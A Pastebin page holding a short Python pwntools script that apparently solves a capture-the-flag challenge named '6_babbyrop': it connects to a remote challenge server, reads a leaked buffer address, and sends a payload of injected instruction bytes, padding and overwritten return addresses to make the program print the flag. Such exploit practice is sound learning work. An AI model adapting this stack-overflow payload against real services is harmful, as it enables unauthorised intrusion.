Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- dec_address = 0x401020
- exit_address = 0x400e70
- pop_rdi = 0x00401963
- splift = 0x00400f28
- def main():
- #p = process("./6_babbyrop")
- p = remote("exploitables.dcdark.net", 31337)
- # Get buffer address
- address = int(p.readline(), 16)
- log.info("Got buffer address: 0x%x" % address)
- #raw_input(str(p.proc.pid))
- ropchain = ""
- ropchain += "\xbf\x41\x41\x41\x41" # mov edi,0x41414141
- ropchain += "\xc3" # ret
- ropchain = ropchain.ljust(24, "A")
- ropchain += p64(address)
- ropchain += p64(dec_address)
- p.send(ropchain)
- flag = p.readline().strip()
- if "key" in flag:
- log.success("Flag: %s" % flag)
- else:
- log.info("Exploit failed.")
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement